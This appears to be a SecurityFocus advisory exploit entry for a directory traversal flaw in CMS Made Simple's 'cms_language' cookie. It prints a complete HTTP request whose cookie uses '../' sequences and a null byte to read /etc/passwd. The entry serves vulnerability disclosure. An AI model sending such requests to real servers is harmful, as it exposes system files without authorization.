CMS Made Simple 'cms_language' Cookie Parameter Directory Traversal Vulnerability

An attacker can exploit this issue with a browser.

The following example HTTP request is available:

GET http://www.example.com/admin/login.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.example.com
Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1
Connection: Close
Pragma: no-cache


 

Privacy Statement
Copyright 2010, SecurityFocus